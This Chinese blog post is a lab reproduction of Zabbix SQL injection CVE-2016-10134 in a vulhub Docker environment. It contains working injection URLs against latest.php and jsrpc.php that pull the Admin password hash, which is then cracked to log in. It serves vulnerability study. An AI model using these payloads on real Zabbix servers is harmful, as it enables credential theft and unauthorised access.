0
点赞
收藏
分享

微信扫一扫

漏洞复现之Zabbix latest.php SQL注入漏洞(CVE-2016-10134)

三分梦_0bc3 2022-10-06 阅读 195
Zabbix latest.phplatest.php SQL注入漏洞CVE-2016-10134Zabbix SQL注入漏洞cve-2016-10134安全技术网络/安全

漏洞描述

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]和jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。

安全等级

影响版本

zabbix 2.2.x,3.0.0-3.0.3

修复建议

更新至最新版

环境搭建

使用vulhub中的漏洞环境进行测试

cd /vulhub/zabbix/CVE-2016-10134
docker-compose up -d
docker ps

启动成功后访问http://yourip:8080/ 具体的端口用docker ps命令进行查看,一般是8080

测试示例

示例一

该版本的zabbix默认开启guest账号登录,在登录界面出使用guset登录 image-20220527155254243.png image-20220527155301558.png

使用burp抓包,将zbx_sessionid的后16位字符做为sid值 sid=7b9d88abb06c0fc4 image-20220527164633099.png

构造sql语句进行测试 判断是否存在漏洞,访问下列url,burp抓包,确认存在漏洞

http://192.168.74.128:8080/latest.php?output=ajax&sid=7b9d88abb06c0fc4&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

image-20220527172452950.png

获取用户名和密码 将构造的sql语句在burp里进行url编码,将编码后的内容填入到0x7e,后面 获取到用户名为Admin,密码hash为5fce1b3e34b520afeffb37ce0,但是密码hash长度不对

(select concat(alias,0x7e,passwd) from zabbix.users limit 0,1) 
url编码后为:
%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%61%6c%69%61%73%2c%30%78%37%65%2c%70%61%73%73%77%64%29%20%66%72%6f%6d%20%7a%61%62%62%69%78%2e%75%73%65%72%73%20%6c%69%6d%69%74%20%30%2c%31%29

GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=
updatexml(0,concat(0x7e,%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%61%6c%69%61%73%2c%30%78%37%65%2c%70%61%73%73%77%64%29%20%66%72%6f%6d%20%7a%61%62%62%69%78%2e%75%73%65%72%73%20%6c%69%6d%69%74%20%30%2c%31%29),0

image-20220527181217449.png

再次构造语句,获取到后半段的密码hash,520afeffb37ce08c7cd66

(select concat(alias,0x7e,mid(passwd,12,32)) from zabbix.users limit 0,1)
url编码后为
%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%61%6c%69%61%73%2c%30%78%37%65%2c%6d%69%64%28%70%61%73%73%77%64%2c%31%32%2c%33%32%29%29%20%66%72%6f%6d%20%7a%61%62%62%69%78%2e%75%73%65%72%73%20%6c%69%6d%69%74%20%30%2c%31%29

GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=
updatexml(0,concat(0x7e,%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%61%6c%69%61%73%2c%30%78%37%65%2c%6d%69%64%28%70%61%73%73%77%64%2c%31%32%2c%33%32%29%29%20%66%72%6f%6d%20%7a%61%62%62%69%78%2e%75%73%65%72%73%20%6c%69%6d%69%74%20%30%2c%31%29),0) HTTP/1.1

image-20220527181108871.png

将两段hash结合后为: 5fce1b3e34b520afeffb37ce0520afeffb37ce08c7cd66,md5值解密后为zabbix image-20220527181839910.png

使用账号Admin/zabbix登录成功 image-20220527182149122.png

注:以上内容为实验环境,只做为漏洞案例学习,切勿用于其他用途。

举报

相关推荐

Zabbix latest.php SQL注入漏洞(CVE-2016-10134)

zabbixCVE-2016-10134cve-2016-10134zabbix sql注入漏洞sql注入安全技术网络/安全

漏洞复现之Zabbix Server Trapper命令注入漏洞(CVE-2020-11800)

Zabbix Trapper命令注入漏洞ZabbixServer TrapperCVE-2020-11800Trapper命令注入漏洞Zabbix Server安全技术网络/安全

Django SQL注入漏洞复现 (CVE-2022-28347)

DjangoSQL注入漏洞复现

SQL注入漏洞复现1

自动驾驶人工智能机器学习

【漏洞复现】SpringBlade menu/list SQL注入漏洞

spring boot后端java

XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

edge

「漏洞复现」Palo Alto Networks Expedition 未授权SQL注入漏洞(CVE-2024-9465)

java消息队列

ActiveMq PUT任意文件上传漏洞(CVE-2016-3088)漏洞复现

矩阵算法线性代数

【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞

condawindows

【漏洞复现】Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)

apacheshiro漏洞复现
0 条评论